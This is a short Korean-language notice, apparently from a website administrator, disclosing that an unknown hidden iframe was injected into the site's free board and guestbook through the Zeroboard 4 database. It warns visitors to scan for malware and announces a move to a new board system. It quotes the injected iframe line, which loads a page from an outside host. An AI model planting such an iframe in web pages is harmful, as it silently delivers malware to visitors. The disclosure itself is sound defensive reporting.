자유게시판과 방명록에 악성 코드가 있었습니다.

자유게시판과 방명록에 다음과 같은 출처 불명의 HTML 코드가 삽입되어 있었습니다.

<iframe src=http://www.mir3-online.com:8181/mm/win.html width=30 height=1></iframe>

오늘(12월 14일) 새벽 0시 30분 정도에 자유게시판에 들어가려는데 avast!가 경고해 주어서 발견했습니다. 정확히 언제부터 있었는지는 모르겠고요. 어제(13일) 오후에 들렀을 때에는 avast!가 경고를 하지 않았었습니다만... 어쨌든 최근 며칠 사이에 자유게시판이나 방명록에 들르신 분들은 혹시 모르니 악성 코드 검사 한 번 해보세요. 불편을 드려 죄송합니다!

문제의 코드는 제로보드 4 그룹 설정 테이블(zetyx_group_table)에 삽입되어 있었습니다. PHP 파일 자체가 변조된 흔적은 없는 것으로 봐서 서버 계정이 뚫린 것 같지는 않고 아마도 제로보드 어딘가의 구멍을 통한 SQL 주입 공격이 아니었나 싶습니다. 제로보드 4 최신 패치가 적용된 상태이지만 최신 패치가 나온지도 꽤 오래 되었고... 애초에 제로보드 4를 아직까지 사용하는 것이 잘못입니다.

조만간 다른 게시판 시스템으로 이전하겠습니다.